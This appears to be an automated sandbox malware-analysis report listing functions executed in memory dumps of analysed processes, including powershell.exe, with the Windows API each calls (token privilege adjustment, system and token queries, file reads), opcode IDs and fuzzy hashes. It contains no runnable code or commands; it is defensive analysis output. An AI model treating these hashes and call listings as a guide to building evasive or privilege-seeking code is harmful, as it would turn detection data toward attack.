                                                                                            Function 02771116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadUILanguage.KERNEL32(?), ref: 02771148
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2154362954.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguageThread
                                                                                            • String ID:
                                                                                            • API String ID: 243849632-0
                                                                                            • Opcode ID: 57bd0812a837c445bf596f6f40652b88c89deb102ead3d22621b8872d9ddfcd8
                                                                                            • Instruction ID: c6783f0a4afafe68a5a4cc149db0bc1f1f02fe781d861e3cfbb46f41be14af45
                                                                                            • Opcode Fuzzy Hash: 57bd0812a837c445bf596f6f40652b88c89deb102ead3d22621b8872d9ddfcd8
                                                                                            • Instruction Fuzzy Hash: D7F0FF34500740DFEF20CF05D885762FBA0EF00A21F48C0DACC084F312D675A444CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0058A36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetErrorMode.KERNELBASE(?), ref: 0058A39C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2141978515.000000000058A000.00000040.00000001.sdmp, Offset: 0058A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: 2a9f9dd1ba8c6f1cada8ec0af4dd513adbd807e948228e6cda6c3f4c8db4440b
                                                                                            • Instruction ID: a85c63b17130e0b7391cb829e1515e3c9779ba8fdf6e5b56af5fe5108cf16f98
                                                                                            • Opcode Fuzzy Hash: 2a9f9dd1ba8c6f1cada8ec0af4dd513adbd807e948228e6cda6c3f4c8db4440b
                                                                                            • Instruction Fuzzy Hash: 35F0D734504740DFFB20AF06D888725FFA0EB00320F28C89ACC085B212DBB4A908CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0277096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 0277099C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2154362954.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InfoSystem
                                                                                            • String ID:
                                                                                            • API String ID: 31276548-0
                                                                                            • Opcode ID: 13364bab4b6469a6600ceb168384cca43893d9108f7851d8f6c877fc1b3d5c56
                                                                                            • Instruction ID: ff78b0a08855cb21344cb04514a1c545b77dff82cede283be31a6302817ce18c
                                                                                            • Opcode Fuzzy Hash: 13364bab4b6469a6600ceb168384cca43893d9108f7851d8f6c877fc1b3d5c56
                                                                                            • Instruction Fuzzy Hash: 1AF0A975904740DFEF209F06D889766FBA0EF15621F18C09ADD494B356D275A408CEA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0058AA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleOutputCP.KERNEL32 ref: 0058AA71
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2141978515.000000000058A000.00000040.00000001.sdmp, Offset: 0058A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleOutput
                                                                                            • String ID:
                                                                                            • API String ID: 3985236979-0
                                                                                            • Opcode ID: 04dab5d30738c8199b0462632f1d6b7d9210132dab692ecfe9b57c059ebe6093
                                                                                            • Instruction ID: 6efebddda289c8948a234a4d203c160269a5bb244539ef07a79e9a0cc106d6b5
                                                                                            • Opcode Fuzzy Hash: 04dab5d30738c8199b0462632f1d6b7d9210132dab692ecfe9b57c059ebe6093
                                                                                            • Instruction Fuzzy Hash: 49F0CD31504740CFEB10EF05D989761FFA0EF44721F18C09BDD095BA52D278E904CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0058A974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(?), ref: 0058A9C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2141978515.000000000058A000.00000040.00000001.sdmp, Offset: 0058A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: 1b9d35fd73f966664ffc96c04320aaa45882400a9624479e2d21c8d7d0251dde
                                                                                            • Instruction ID: 75080b976f0faf26f1a5caeb9e3faa23e05fc4926aea19b4c489ae6a4e285d4c
                                                                                            • Opcode Fuzzy Hash: 1b9d35fd73f966664ffc96c04320aaa45882400a9624479e2d21c8d7d0251dde
                                                                                            • Instruction Fuzzy Hash: 071191715093809FDB11CF25DC45B92BFA4EF02220F0980ABED45CB262D275A808CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0058A996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(?), ref: 0058A9C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2141978515.000000000058A000.00000040.00000001.sdmp, Offset: 0058A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: 18ad39c81c6797d15ef08418e30879acc570aaba660d222b66077d7004e2ed2b
                                                                                            • Instruction ID: 34f5d5021e7d444c6cfdd0715298666a3812f4d78b2e45a689eb70500f5bd143
                                                                                            • Opcode Fuzzy Hash: 18ad39c81c6797d15ef08418e30879acc570aaba660d222b66077d7004e2ed2b
                                                                                            • Instruction Fuzzy Hash: 42018B75604680DFEB10EF19D8897A6FFA4EF04320F18C4ABDD099B652D675A804CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02A107F7, Relevance: .0, Instructions: 45COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2155119628.0000000002A10000.00000040.00000040.sdmp, Offset: 02A10000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 04b081f6aae996fda6e87843e2eab0c2fffdb4bc86b925be4aded0f599f4dcd3
                                                                                            • Instruction ID: 11768c9c3446527b1c95d8234dd5a0bd5b688a034b4ef143f0803020bae963a2
                                                                                            • Opcode Fuzzy Hash: 04b081f6aae996fda6e87843e2eab0c2fffdb4bc86b925be4aded0f599f4dcd3
                                                                                            • Instruction Fuzzy Hash: 6801A7B25097806FD7118F15EC40C53BFE8DF47670B0984AFEC898B612D229A909CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02A1081E, Relevance: .0, Instructions: 27COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2155119628.0000000002A10000.00000040.00000040.sdmp, Offset: 02A10000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 77093d4833c1b3ba9bf6342ba4c7da5c447d4b6bb7924cdbd04321188ce2a378
                                                                                            • Instruction ID: 292a4fa4d4c4e39210ebf96b7d4d40b2d67875080526c4f1b761af4683208b46
                                                                                            • Opcode Fuzzy Hash: 77093d4833c1b3ba9bf6342ba4c7da5c447d4b6bb7924cdbd04321188ce2a378
                                                                                            • Instruction Fuzzy Hash: 18E092B66047008BDB50DF0AEC41452F7D4EB84A30B18C07FDC0D8B711E535B504CAA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 005823F4, Relevance: .0, Instructions: 15COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2141960962.0000000000582000.00000040.00000001.sdmp, Offset: 00582000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 40af28777acd223cfee0dfaa110cec5d97b407e9cdd610f41725473d1997049b
                                                                                            • Instruction ID: 9574fc83194e435a430b429262610008e2f5310b5e3074e892d1055ca5b5a7c6
                                                                                            • Opcode Fuzzy Hash: 40af28777acd223cfee0dfaa110cec5d97b407e9cdd610f41725473d1997049b
                                                                                            • Instruction Fuzzy Hash: 68D05E79204A818FDB16AA1CC1A4B953F94BF55B04F4644FAEC40CB6B3C768E981D210
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 005823BC, Relevance: .0, Instructions: 14COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2141960962.0000000000582000.00000040.00000001.sdmp, Offset: 00582000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a5e73eb77e720c61a58723828d16c8d98f7ecf1bfd1e47ceb10d7c2cfd5ce74f
                                                                                            • Instruction ID: dd7af7bdc3047568b67de689492281b464195d1d50d1bbb603ea985a71f32d2b
                                                                                            • Opcode Fuzzy Hash: a5e73eb77e720c61a58723828d16c8d98f7ecf1bfd1e47ceb10d7c2cfd5ce74f
                                                                                            • Instruction Fuzzy Hash: FDD05E343006818FDB16DA1CC1A4F597BE4BF40700F0648E8BC408B666C7A8E980C600
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Analysis Process: powershell.exe PID: 2360 Parent PID: 2900 powershell.exeCOMMON

                                                                                            Executed Functions

                                                                                            Function 0066ACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0066AD37
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2147500974.000000000066A000.00000040.00000001.sdmp, Offset: 0066A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AdjustPrivilegesToken
                                                                                            • String ID:
                                                                                            • API String ID: 2874748243-0
                                                                                            • Opcode ID: 29a71c85721e3d17394daa09b434a495baa9db4a1ae0926eb278da0e1756d6c3
                                                                                            • Instruction ID: e60dcb6d12bde6b899b82654469aa48081cbb29e05b8a082e46cd8daa36d4ffd
                                                                                            • Opcode Fuzzy Hash: 29a71c85721e3d17394daa09b434a495baa9db4a1ae0926eb278da0e1756d6c3
                                                                                            • Instruction Fuzzy Hash: 8421A3755097849FDB128F25DC44B92BFB4EF16310F0884DAE9858B663D271E908DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0066ACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0066AD37
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2147500974.000000000066A000.00000040.00000001.sdmp, Offset: 0066A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AdjustPrivilegesToken
                                                                                            • String ID:
                                                                                            • API String ID: 2874748243-0
                                                                                            • Opcode ID: 6cf8195e68743cf4f3c3ff4c782440fb39fec7f41b200d9d146af25b1cbe421a
                                                                                            • Instruction ID: 0f86a26dee551ec0a769eb348b6646b8d77c91971a77ad785c36a957414cd1a7
                                                                                            • Opcode Fuzzy Hash: 6cf8195e68743cf4f3c3ff4c782440fb39fec7f41b200d9d146af25b1cbe421a
                                                                                            • Instruction Fuzzy Hash: 9C115E755007049FEB20CF55D884B96FBE4EF05321F08C4AAED499BA62D331E814DF62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0066B2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0066B329
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2147500974.000000000066A000.00000040.00000001.sdmp, Offset: 0066A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationQuerySystem
                                                                                            • String ID:
                                                                                            • API String ID: 3562636166-0
                                                                                            • Opcode ID: 9d3cef9503d27e997bcd71dd2dc4c45347ac962a672e44bcedfa9aa1e4d41ada
                                                                                            • Instruction ID: aa36f4bb4f5dfd7e60a990a953c1c649abb2ebf19f3594128a24bec296ef9227
                                                                                            • Opcode Fuzzy Hash: 9d3cef9503d27e997bcd71dd2dc4c45347ac962a672e44bcedfa9aa1e4d41ada
                                                                                            • Instruction Fuzzy Hash: 9011A071508380AFDB228F11DC45F52FFB4EF46320F09849AED844B663D275A818DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0066B2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0066B329
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2147500974.000000000066A000.00000040.00000001.sdmp, Offset: 0066A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationQuerySystem
                                                                                            • String ID:
                                                                                            • API String ID: 3562636166-0
                                                                                            • Opcode ID: 6f2291423b760013ea787c61e8108a4616f6ccf6d78d23e4b584fce75ee56431
                                                                                            • Instruction ID: 68394f36a44b4096bccbbfa440290527bf7e1e45a656d341a8ed75b6f28dd1a6
                                                                                            • Opcode Fuzzy Hash: 6f2291423b760013ea787c61e8108a4616f6ccf6d78d23e4b584fce75ee56431
                                                                                            • Instruction Fuzzy Hash: 4901AD32500740DFEB20CF05D885B65FBA0EF54720F18C49ADD499B712D371A858DBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027C0118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTitleW.KERNEL32(?), ref: 027C01D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2155524380.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleTitle
                                                                                            • String ID:
                                                                                            • API String ID: 3358957663-0
                                                                                            • Opcode ID: e45b2490d306f1f9d569b0e639e642ec76941a314455c439ca988272484b74ac
                                                                                            • Instruction ID: 16ab1105a00601adb68a1908573f9bdf7a170b1ab5d1060502f2197a1fcdd648
                                                                                            • Opcode Fuzzy Hash: e45b2490d306f1f9d569b0e639e642ec76941a314455c439ca988272484b74ac
                                                                                            • Instruction Fuzzy Hash: 1531387650E3C08FE7138B759C65692BFB4AF43310B0E84DBD884CF1A3D6259809DBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027C067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 027C072D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2155524380.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 3d519dd1fdb5c8e96863363124708cc9606a19fac12f2b33ab1abac1a94046d3
                                                                                            • Instruction ID: c5cc196a78603b3161c6432b8127b9db40472c3d3cae2d722bc72512ae0adacb
                                                                                            • Opcode Fuzzy Hash: 3d519dd1fdb5c8e96863363124708cc9606a19fac12f2b33ab1abac1a94046d3
                                                                                            • Instruction Fuzzy Hash: C3318471504340AFE722CF65CC45F56BFF8EF05310F1984AEE9848B292D335A808CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027C0D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegisterEventSourceW.ADVAPI32(?), ref: 027C0DD6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2155524380.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EventRegisterSource
                                                                                            • String ID:
                                                                                            • API String ID: 1693822063-0
                                                                                            • Opcode ID: 3b10c5a9df64015f4a94a41ed0b1df421f30e8ddd57531925da642fd29609e63
                                                                                            • Instruction ID: e9ccd877990cac552d8a527864fcf8543c4f921a68d1d9b0cab7b2c2db590d12
                                                                                            • Opcode Fuzzy Hash: 3b10c5a9df64015f4a94a41ed0b1df421f30e8ddd57531925da642fd29609e63
                                                                                            • Instruction Fuzzy Hash: A53184B1509380AFE712CB25DC45B96BFE8DF06354F1884AEE984CB293D275A905C772
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0066AF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32EnumProcessModules.KERNEL32(?,00000E9C,F398E8A0,00000000,00000000,00000000,00000000), ref: 0066AFBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2147500974.000000000066A000.00000040.00000001.sdmp, Offset: 0066A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EnumModulesProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1082081703-0
                                                                                            • Opcode ID: ee23194a93f33842733bf0532982cf2cb6f65f2e0be48a1d663d758c3db99d76
                                                                                            • Instruction ID: 487de31b787798170c06038a4f875d2cfab7ba81039954b12929eb39ada4cb8b
                                                                                            • Opcode Fuzzy Hash: ee23194a93f33842733bf0532982cf2cb6f65f2e0be48a1d663d758c3db99d76
                                                                                            • Instruction Fuzzy Hash: A421A5B2509380AFE7128F60DC45B96BFB8EF06320F1884DAE984DB193D265A945C761
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0066BD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTokenInformation.KERNELBASE(?,00000E9C,F398E8A0,00000000,00000000,00000000,00000000), ref: 0066BDBC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2147500974.000000000066A000.00000040.00000001.sdmp, Offset: 0066A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationToken
                                                                                            • String ID:
                                                                                            • API String ID: 4114910276-0
                                                                                            • Opcode ID: d2157d114aa3ba1d1fc1328e4668ed422aafccd9a6de37dc0cbaf90af3e95571
                                                                                            • Instruction ID: eec1ec4f02afe02c790236b9f2de708815da8f789404279cd3813fe4de2336de
                                                                                            • Opcode Fuzzy Hash: d2157d114aa3ba1d1fc1328e4668ed422aafccd9a6de37dc0cbaf90af3e95571
                                                                                            • Instruction Fuzzy Hash: 1631C571409380AFE712CB60CC55F96BFB8EF06310F0884DBF984CB192D225A908C7B1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027C0FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 027C109E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2155524380.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationVolume
                                                                                            • String ID:
                                                                                            • API String ID: 2039140958-0
                                                                                            • Opcode ID: 4660fb0909c42247f641f50e2fe4646d6d104c44d09833d04c2d6a391845fe5f
                                                                                            • Instruction ID: 2fdc9af1c2de955073e410609cd1f5a86ab98ae763b83ba677d619de88773858
                                                                                            • Opcode Fuzzy Hash: 4660fb0909c42247f641f50e2fe4646d6d104c44d09833d04c2d6a391845fe5f
                                                                                            • Instruction Fuzzy Hash: 7231737550E3C05FD3138B358C55B55BFB4AF43610F1A81DBD884CF2A3D629A909C7A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0066B01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32GetModuleInformation.KERNEL32(?,00000E9C,F398E8A0,00000000,00000000,00000000,00000000), ref: 0066B0AE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2147500974.000000000066A000.00000040.00000001.sdmp, Offset: 0066A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationModule
                                                                                            • String ID:
                                                                                            • API String ID: 3425974696-0
                                                                                            • Opcode ID: 5e596d4fd576c358348f60de91af15eef1855ffc1e0b436ec887c8d66254668b
                                                                                            • Instruction ID: 153d952b1ec4ea915bd1c1cc2afb28ec9931a35920933c5a5df37d79c88edf6b
                                                                                            • Opcode Fuzzy Hash: 5e596d4fd576c358348f60de91af15eef1855ffc1e0b436ec887c8d66254668b
                                                                                            • Instruction Fuzzy Hash: 25217171509380EFE722CB15DC45FA7BFA8EF46320F0884AAE945DB252D664A948CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0066A1A8, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 0066A23E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2147500974.000000000066A000.00000040.00000001.sdmp, Offset: 0066A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleCtrlHandler
                                                                                            • String ID:
                                                                                            • API String ID: 1513847179-0
                                                                                            • Opcode ID: f707814dc1d43eadb9f442187c3c348830c0bcd32cc44e77366f95bf63e3ea2f
                                                                                            • Instruction ID: e8a483a4e4240e73070a6596eb77f5e83b2aa7cd395e451492e3e3c2b0f6f97b
                                                                                            • Opcode Fuzzy Hash: f707814dc1d43eadb9f442187c3c348830c0bcd32cc44e77366f95bf63e3ea2f
                                                                                            • Instruction Fuzzy Hash: DE21B77140D3C16FD312CB358C55B65BF74EF43620F1985DBD8848B593D225A919C7B2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027C0784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileType.KERNELBASE(?,00000E9C,F398E8A0,00000000,00000000,00000000,00000000), ref: 027C0819
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2155524380.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileType
                                                                                            • String ID:
                                                                                            • API String ID: 3081899298-0
                                                                                            • Opcode ID: 430464b80db447afda9ec3a3b2b7711e47d5ddc2f1b113f09e4123cd753c2cb8
                                                                                            • Instruction ID: add36bb96d78caa8803da723ed05fa6a0c19ec668d4b0396130f059175bac730
                                                                                            • Opcode Fuzzy Hash: 430464b80db447afda9ec3a3b2b7711e47d5ddc2f1b113f09e4123cd753c2cb8
                                                                                            • Instruction Fuzzy Hash: 1321DA76408780AFE712CB259C55FA3BFA8EF46720F1985DBF9848B193D224A905C7B1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027C0464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 027C0502
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2155524380.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FolderPath
                                                                                            • String ID:
                                                                                            • API String ID: 1514166925-0
                                                                                            • Opcode ID: 0a14857f12828936ae9973e1d2071549989ed77fac6b372f017f65c1c6e1a679
                                                                                            • Instruction ID: 60b69740029e5edab9f1799b245ae56aa0b1560cb939dff60a075be2717e83cc
                                                                                            • Opcode Fuzzy Hash: 0a14857f12828936ae9973e1d2071549989ed77fac6b372f017f65c1c6e1a679
                                                                                            • Instruction Fuzzy Hash: 05217F7540E3C0AFD3128B358C55B66BFB4EF87610F1A81CBD8848F693D225A919C7B2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027C06AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 027C072D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2155524380.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: b019f146e0b4cca5ef4266f3add6148203746d583d7740931a86ded85ccca35d
                                                                                            • Instruction ID: c19bfcf6366d5f0ccab159d428902c2c0aac2edce05465a3bae4d1e1bcb41606
                                                                                            • Opcode Fuzzy Hash: b019f146e0b4cca5ef4266f3add6148203746d583d7740931a86ded85ccca35d
                                                                                            • Instruction Fuzzy Hash: 62219C71500300EFEB21DF65CD85F66FBE8EF08350F14846EE9499A292D331E904CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027C0854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(?,00000E9C,F398E8A0,00000000,00000000,00000000,00000000), ref: 027C08E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2155524380.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 1aa2720a80c46a00b3f7f7eb99d61043b30c096e336ad9561f125380ba9513a8
                                                                                            • Instruction ID: d5454d8ef262ceef3b46ea5a5602c9a1a3f30a14b5fc84f437d71cac2393742d
                                                                                            • Opcode Fuzzy Hash: 1aa2720a80c46a00b3f7f7eb99d61043b30c096e336ad9561f125380ba9513a8
                                                                                            • Instruction Fuzzy Hash: 45219271409380AFE722CF61DC45F56BFB8EF46314F19849FE9449B153C265A909CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0066A8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0066A94A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2147500974.000000000066A000.00000040.00000001.sdmp, Offset: 0066A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguagesPreferredThread
                                                                                            • String ID:
                                                                                            • API String ID: 842807343-0
                                                                                            • Opcode ID: 057f60437bf5824074b8d8582157238bfca310fec503ad1fff83731a1eec4aff
                                                                                            • Instruction ID: 063031948bf34056beffde4fde3dbd03fabb9421dc682c390b9ceef440fb394d
                                                                                            • Opcode Fuzzy Hash: 057f60437bf5824074b8d8582157238bfca310fec503ad1fff83731a1eec4aff
                                                                                            • Instruction Fuzzy Hash: C421957540D780AFD3138B25DC51B62BFB8EF87610F1981DBE8848B653D224A919C7B2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027C0D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegisterEventSourceW.ADVAPI32(?), ref: 027C0DD6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2155524380.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EventRegisterSource
                                                                                            • String ID:
                                                                                            • API String ID: 1693822063-0
                                                                                            • Opcode ID: 5ac5f909446642c490e023bdfb2c34340df8df0efd4258ebe88828f91af9f627
                                                                                            • Instruction ID: 851f520279cef06be3c03fbba4af202b8db1bfa8e479d35d416dd82371308aa6
                                                                                            • Opcode Fuzzy Hash: 5ac5f909446642c490e023bdfb2c34340df8df0efd4258ebe88828f91af9f627
                                                                                            • Instruction Fuzzy Hash: 91216DB1604240EFEB20DF25DC85BA6FBD8EF05754F1484AEED48DB282D775E904CAA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0066BD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTokenInformation.KERNELBASE(?,00000E9C,F398E8A0,00000000,00000000,00000000,00000000), ref: 0066BDBC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2147500974.000000000066A000.00000040.00000001.sdmp, Offset: 0066A000, based on PE: false
                                                                                            Similarity
